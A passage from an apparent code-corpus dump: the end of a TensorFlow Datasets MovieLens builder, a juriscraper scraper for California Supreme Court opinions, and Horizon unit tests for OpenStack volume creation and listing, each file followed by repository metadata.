download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-100k.zip'),
parsing_fn=movielens_parsing.parse_100k_movies_data,
),
MovieLensConfig(
name='1m-ratings',
description=textwrap.dedent("""\
This dataset contains 1,000,209 anonymous ratings of approximately
3,900 movies made by 6,040 MovieLens users who joined MovieLens in
2000. This dataset is the largest dataset that includes
demographic data.
Each user has rated at least 20 movies. Ratings are in whole-star
increments. In demographic data, age values are divided into
ranges and the lowest age value for each range is used in the data
instead of the actual values."""),
version='0.1.0',
format_version='1m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-1m.zip'),
parsing_fn=movielens_parsing.parse_1m_ratings_data,
),
MovieLensConfig(
name='1m-movies',
description=textwrap.dedent("""\
This dataset contains data of approximately 3,900 movies rated in
the 1m dataset."""),
version='0.1.0',
format_version='1m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-1m.zip'),
parsing_fn=movielens_parsing.parse_1m_movies_data,
),
MovieLensConfig(
name='20m-ratings',
description=textwrap.dedent("""\
This dataset contains 20,000,263 ratings across 27,278
movies, created by 138,493 users between January 09, 1995 and
March 31, 2015. This dataset was generated on October 17, 2016.
Each user has rated at least 20 movies. Ratings are in half-star
increments. This dataset does not contain demographic data."""),
version='0.1.0',
format_version='20m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-20m.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='20m-movies',
description=textwrap.dedent("""\
This dataset contains data of 27,278 movies rated in the 20m
dataset"""),
version='0.1.0',
format_version='20m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-20m.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
]
VERSION = tfds.core.Version('0.1.0')
def _info(self) -> tfds.core.DatasetInfo:
"""Returns DatasetInfo according to self.builder_config."""
movie_features_dict = {
'movie_id':
tf.string,
'movie_title':
tf.string,
'movie_genres':
tfds.features.Sequence(
tfds.features.ClassLabel(names=[
'Action',
'Adventure',
'Animation',
'Children',
'Comedy',
'Crime',
'Documentary',
'Drama',
'Fantasy',
'Film-Noir',
'Horror',
'IMAX',
'Musical',
'Mystery',
'Romance',
'Sci-Fi',
'Thriller',
'Unknown',
'War',
'Western',
'(no genres listed)',
]),),
}
rating_features_dict = {
'user_id': tf.string,
'user_rating': tf.float32,
# Using int64 since tfds currently does not support float64.
'timestamp': tf.int64,
}
demographic_features_dict = {
'user_gender':
tf.bool,
'bucketized_user_age':
tf.float32,
'user_occupation_label':
tfds.features.ClassLabel(names=[
'academic/educator',
'artist',
'clerical/admin',
'customer service',
'doctor/health care',
'entertainment',
'executive/managerial',
'farmer',
'homemaker',
'lawyer',
'librarian',
'other/not specified',
'programmer',
'retired',
'sales/marketing',
'scientist',
'self-employed',
'student',
'technician/engineer',
'tradesman/craftsman',
'unemployed',
'writer',
]),
'user_occupation_text':
tf.string,
'user_zip_code':
tf.string,
}
features_dict = {}
if self.builder_config.table_option == 'movies':
features_dict.update(movie_features_dict)
# For the other cases, self.builder_config.table_option == 'ratings'.
# Older versions of MovieLens (1m, 100k) have demographic features.
elif self.builder_config.format_version == '1m':
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
features_dict.update(demographic_features_dict)
elif self.builder_config.format_version == '100k':
# Only the 100k dataset contains exact user ages. The 1m dataset
# contains only bucketized age values.
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
features_dict.update(demographic_features_dict)
features_dict.update(raw_user_age=tf.float32)
else:
features_dict.update(movie_features_dict)
features_dict.update(rating_features_dict)
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION,
features=tfds.features.FeaturesDict(features_dict),
supervised_keys=None,
homepage='https://grouplens.org/datasets/movielens/',
citation=_CITATION,
)
def _split_generators(
self, dl_manager: tfds.download.DownloadManager
) -> List[tfds.core.SplitGenerator]:
"""Returns SplitGenerators."""
extracted_path = dl_manager.download_and_extract(
self.builder_config.download_url,)
dir_path = os.path.join(
extracted_path,
'ml-%s' % self.builder_config.format_version,
)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={'dir_path': dir_path},
),
]
def _generate_examples(
self,
dir_path: Optional[str] = None) -> Iterator[Tuple[int, Dict[str, Any]]]:
"""Yields examples by calling the corresponding parsing function."""
for ex in self.builder_config.parsing_fn(dir_path):
yield ex
class MovieLens(Movielens):
"""MovieLens rating dataset (deprecated handle version)."""
def __init__(self, **kwargs):
logging.warning(
'The handle "movie_lens" for the MovieLens dataset is deprecated. '
'Prefer using "movielens" instead.')
super(MovieLens, self).__init__(**kwargs)
|
apache-2.0
| 1,772,383,642,943,722,500
| 37.592672
| 80
| 0.612833
| false
| 3.964357
| true
| false
| false
|
brianwc/juriscraper
|
opinions/united_states/state/cal.py
|
1
|
1498
|
from juriscraper.OpinionSite import OpinionSite
import re
import time
from datetime import date
class Site(OpinionSite):
def __init__(self):
super(Site, self).__init__()
self.url = 'http://www.courtinfo.ca.gov/cgi-bin/opinions-blank.cgi?Courts=S'
self.court_id = self.__module__
def _get_case_names(self):
case_names = []
for name in self.html.xpath('//table/tr/td[3]/text()'):
date_regex = re.compile(r' \d\d?\/\d\d?\/\d\d| filed')
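            # e.g. a hypothetical cell 'P. v. Smith 1/2/14' splits to 'P. v. Smith'
            # and is then expanded to 'People v. Smith' below.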
if 'P. v. ' in date_regex.split(name)[0]:
case_names.append(date_regex.split(name)[0].replace("P. ", "People "))
else:
case_names.append(date_regex.split(name)[0])
return case_names
def _get_download_urls(self):
return [t for t in self.html.xpath("//table/tr/td[2]/a/@href[contains(.,'PDF')]")]
def _get_case_dates(self):
dates = []
for s in self.html.xpath('//table/tr/td[1]/text()'):
s = s.strip()
date_formats = ['%b %d %Y', '%b %d, %Y']
for format in date_formats:
try:
dates.append(date.fromtimestamp(time.mktime(time.strptime(s, format))))
except ValueError:
pass
return dates
def _get_docket_numbers(self):
return [t for t in self.html.xpath('//table/tr/td[2]/text()[1]')]
def _get_precedential_statuses(self):
return ['Published'] * len(self.case_names)
|
bsd-2-clause
| 7,258,131,139,515,015,000
| 34.666667
| 91
| 0.548732
| false
| 3.314159
| false
| false
| false
|
openstack/horizon
|
openstack_dashboard/dashboards/project/volumes/tests.py
|
1
|
96001
|
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from django.conf import settings
from django.forms import widgets
from django.template.defaultfilters import slugify
from django.test.utils import override_settings
from django.urls import reverse
from django.utils.http import urlunquote
from openstack_dashboard import api
from openstack_dashboard.api import cinder
from openstack_dashboard.dashboards.project.volumes \
import tables as volume_tables
from openstack_dashboard.dashboards.project.volumes import tabs
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
DETAIL_URL = ('horizon:project:volumes:detail')
INDEX_URL = reverse('horizon:project:volumes:index')
SEARCH_OPTS = dict(status=api.cinder.VOLUME_STATE_AVAILABLE)
ATTACHMENT_ID = '6061364b-6612-48a9-8fee-1a38fe072547'
class VolumeIndexViewTests(test.ResetImageAPIVersionMixin, test.TestCase):
@test.create_mocks({
api.nova: ['server_get', 'server_list'],
api.cinder: ['volume_backup_supported',
'volume_snapshot_list',
'volume_list_paged',
'tenant_absolute_limits',
'group_list'],
})
def _test_index(self, with_attachments=False, with_groups=False):
vol_snaps = self.cinder_volume_snapshots.list()
volumes = self.cinder_volumes.list()
if with_attachments:
server = self.servers.first()
else:
for volume in volumes:
volume.attachments = []
self.mock_volume_backup_supported.return_value = False
if with_groups:
self.mock_group_list.return_value = self.cinder_groups.list()
volumes = self.cinder_group_volumes.list()
self.mock_volume_list_paged.return_value = [volumes, False, False]
if with_attachments:
self.mock_server_get.return_value = server
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_volume_snapshot_list.return_value = vol_snaps
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
res = self.client.get(INDEX_URL)
if with_attachments:
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.mock_volume_snapshot_list.assert_called_once()
if with_groups:
self.mock_group_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.mock_volume_backup_supported.assert_called_with(
test.IsHttpRequest())
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None, search_opts=None,
sort_dir='desc', paginate=True)
self.mock_tenant_absolute_limits.assert_called_with(
test.IsHttpRequest())
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
def test_index_with_volume_attachments(self):
self._test_index(True)
def test_index_no_volume_attachments(self):
self._test_index(False)
def test_index_with_volume_groups(self):
self._test_index(with_groups=True)
@test.create_mocks({
api.nova: ['server_get', 'server_list'],
cinder: ['tenant_absolute_limits',
'volume_list_paged',
'volume_backup_supported',
'volume_snapshot_list'],
})
def _test_index_paginated(self, marker, sort_dir, volumes, url,
has_more, has_prev):
backup_supported = True
vol_snaps = self.cinder_volume_snapshots.list()
server = self.servers.first()
self.mock_volume_backup_supported.return_value = backup_supported
self.mock_volume_list_paged.return_value = [volumes,
has_more, has_prev]
self.mock_volume_snapshot_list.return_value = vol_snaps
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_server_get.return_value = server
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
res = self.client.get(urlunquote(url))
self.assertEqual(2, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=marker, sort_dir=sort_dir,
search_opts=None, paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_tenant_absolute_limits.assert_called_with(
test.IsHttpRequest())
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'horizon/common/_data_table_view.html')
return res
def ensure_attachments_exist(self, volumes):
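        # Give every volume at least one attachment so the pagination tests
        # also exercise the attachment handling in the table.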
volumes = copy.copy(volumes)
for volume in volumes:
if not volume.attachments:
volume.attachments.append({
"id": "1", "server_id": '1', "device": "/dev/hda",
"attachment_id": ATTACHMENT_ID})
return volumes
@override_settings(API_RESULT_PAGE_SIZE=2)
def test_index_paginated(self):
volumes = self.ensure_attachments_exist(self.cinder_volumes.list())
size = settings.API_RESULT_PAGE_SIZE
# get first page
expected_volumes = volumes[:size]
url = INDEX_URL
res = self._test_index_paginated(None, "desc", expected_volumes, url,
True, False)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# get second page
expected_volumes = volumes[size:2 * size]
marker = expected_volumes[0].id
next = volume_tables.VolumesTable._meta.pagination_param
url = "?".join([INDEX_URL, "=".join([next, marker])])
res = self._test_index_paginated(marker, "desc", expected_volumes, url,
True, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# get last page
expected_volumes = volumes[-size:]
marker = expected_volumes[0].id
next = volume_tables.VolumesTable._meta.pagination_param
url = "?".join([INDEX_URL, "=".join([next, marker])])
res = self._test_index_paginated(marker, "desc", expected_volumes, url,
False, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
@override_settings(API_RESULT_PAGE_SIZE=2)
def test_index_paginated_prev_page(self):
volumes = self.ensure_attachments_exist(self.cinder_volumes.list())
size = settings.API_RESULT_PAGE_SIZE
# prev from some page
expected_volumes = volumes[size:2 * size]
marker = expected_volumes[0].id
prev = volume_tables.VolumesTable._meta.prev_pagination_param
url = "?".join([INDEX_URL, "=".join([prev, marker])])
res = self._test_index_paginated(marker, "asc", expected_volumes, url,
True, True)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
# back to first page
expected_volumes = volumes[:size]
marker = expected_volumes[0].id
prev = volume_tables.VolumesTable._meta.prev_pagination_param
url = "?".join([INDEX_URL, "=".join([prev, marker])])
res = self._test_index_paginated(marker, "asc", expected_volumes, url,
True, False)
result = res.context['volumes_table'].data
self.assertCountEqual(result, expected_volumes)
class VolumeViewTests(test.ResetImageAPIVersionMixin, test.TestCase):
def tearDown(self):
for volume in self.cinder_volumes.list():
# VolumeTableMixIn._set_volume_attributes mutates data
# and cinder_volumes.list() doesn't deep copy
for att in volume.attachments:
if 'instance' in att:
del att['instance']
super().tearDown()
@test.create_mocks({
cinder: ['volume_create', 'volume_snapshot_list',
'volume_type_list', 'volume_type_default',
'volume_list', 'availability_zone_list',
'extension_supported', 'group_list'],
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
})
def test_create_volume(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [[], False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=None, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_tenant_quota_usages.assert_called_once_with(
test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_default',
'volume_type_list',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_without_name(self):
volume = self.cinder_volumes.first()
volume_type = self.cinder_volume_types.first()
az = self.cinder_availability_zones.first().zoneName
formData = {'name': '',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_extension_supported.return_value = True
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_availability_zone_list.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], formData['type'], metadata={},
snapshot_id=None, group_id=None, image_id=None,
availability_zone=formData['availability_zone'], source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_list',
'volume_type_default',
'volume_type_list',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_dropdown(self):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'no_source_type',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': self.images.first().id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = \
[self.images.list(), False, False]
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
cinder: ['volume_type_list',
'volume_type_default',
'volume_get',
'volume_snapshot_get',
'volume_create',
'group_list'],
})
def test_create_volume_from_snapshot(self):
volume = self.cinder_volumes.first()
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'snapshot_source': snapshot.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
# get snapshot from url
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_snapshot_get.assert_called_once_with(
test.IsHttpRequest(), str(snapshot.id))
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
snapshot.volume_id)
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=snapshot.id,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'volume_snapshot_list',
'volume_snapshot_get',
'availability_zone_list',
'volume_type_list',
'volume_list',
'volume_type_default',
'volume_get',
'volume_create',
'group_list'],
})
def test_create_volume_from_volume(self):
volume = self.cinder_volumes.first()
formData = {'name': 'A copy of a volume',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'volume_source',
'volume_source': volume.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_image_list_detailed.return_value = \
[self.images.list(), False, False]
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
redirect_url = INDEX_URL
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], None, metadata={}, snapshot_id=None,
group_id=None, image_id=None, availability_zone=None,
source_volid=volume.id)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_list',
'volume_list',
'volume_type_default',
'volume_get',
'volume_snapshot_get',
'volume_snapshot_list',
'volume_create',
'group_list'],
})
def test_create_volume_from_snapshot_dropdown(self):
volume = self.cinder_volumes.first()
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'snapshot_source',
'snapshot_source': snapshot.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_volume_create.return_value = volume
self.mock_group_list.return_value = []
# get snapshot from dropdown list
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
self.mock_volume_snapshot_get.assert_called_once_with(
test.IsHttpRequest(), str(snapshot.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=snapshot.id,
group_id=None, image_id=None, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed'],
cinder: ['volume_snapshot_get',
'volume_type_list',
'volume_type_default',
'volume_get',
'group_list'],
})
def test_create_volume_from_snapshot_invalid_size(self):
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 20, 'snapshot_source': snapshot.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_volume_snapshot_get.return_value = snapshot
self.mock_volume_get.return_value = self.cinder_volumes.first()
self.mock_group_list.return_value = []
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"snapshot size (40GiB)")
self.assertEqual(3, self.mock_volume_type_list.call_count)
self.assertEqual(2, self.mock_volume_type_default.call_count)
self.mock_volume_snapshot_get.assert_called_with(test.IsHttpRequest(),
str(snapshot.id))
self.mock_volume_get.assert_called_with(test.IsHttpRequest(),
snapshot.volume_id)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_type_default',
'volume_type_list',
'volume_create',
'group_list'],
})
def test_create_volume_from_image(self):
volume = self.cinder_volumes.first()
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 40,
'type': '',
'image_source': image.id}
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
        self.mock_volume_type_list.return_value = \
            self.cinder_volume_types.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
# get image from url
url = reverse('horizon:project:volumes:create')
res = self.client.post("?".join([url,
"image_id=" + str(image.id)]),
formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_default.assert_called_once()
self.mock_volume_type_list.assert_called_once()
self.mock_tenant_quota_usages.assert_called_once()
self.mock_image_get.assert_called_once_with(test.IsHttpRequest(),
str(image.id))
self.mock_extension_supported.assert_called_once_with(
test.IsHttpRequest(), 'AvailabilityZones')
self.mock_availability_zone_list.assert_called_once()
self.mock_volume_create.assert_called_once_with(
test.IsHttpRequest(), formData['size'], formData['name'],
formData['description'], '', metadata={}, snapshot_id=None,
group_id=None, image_id=image.id, availability_zone=None,
source_volid=None)
self.mock_group_list.assert_called_with(test.IsHttpRequest())
@test.create_mocks({
quotas: ['tenant_quota_usages'],
api.glance: ['image_list_detailed',
'image_get'],
cinder: ['extension_supported',
'availability_zone_list',
'volume_snapshot_list',
'volume_list',
'volume_type_list',
'volume_type_default',
'volume_create',
'group_list'],
})
def test_create_volume_from_image_dropdown(self):
volume = self.cinder_volumes.first()
image = self.images.first()
formData = {'name': 'A Volume I Am Making',
'description': 'This is a volume I am making for a test.',
'method': 'CreateForm',
'size': 30,
'type': '',
'volume_source_type': 'image_source',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': image.id}
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
self.mock_volume_type_default.return_value = \
self.cinder_volume_types.first()
self.mock_volume_list.return_value = self.cinder_volumes.list()
self.mock_tenant_quota_usages.return_value = \
self.cinder_quota_usages.first()
self.mock_image_get.return_value = image
self.mock_extension_supported.return_value = True
self.mock_availability_zone_list.return_value = \
self.cinder_availability_zones.list()
self.mock_group_list.return_value = []
self.mock_volume_create.return_value = volume
# get image from dropdown list
url = reverse('horizon:project:volumes:create')
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=SEARCH_OPTS)
self.mock_image_list_detailed.assert_called_with(
test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
self.mock_volume_type_default.assert_called_once()
self.mock_volume_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=SEARCH_OPTS)
self.mock_tenant_quota_usages.assert_called_once()
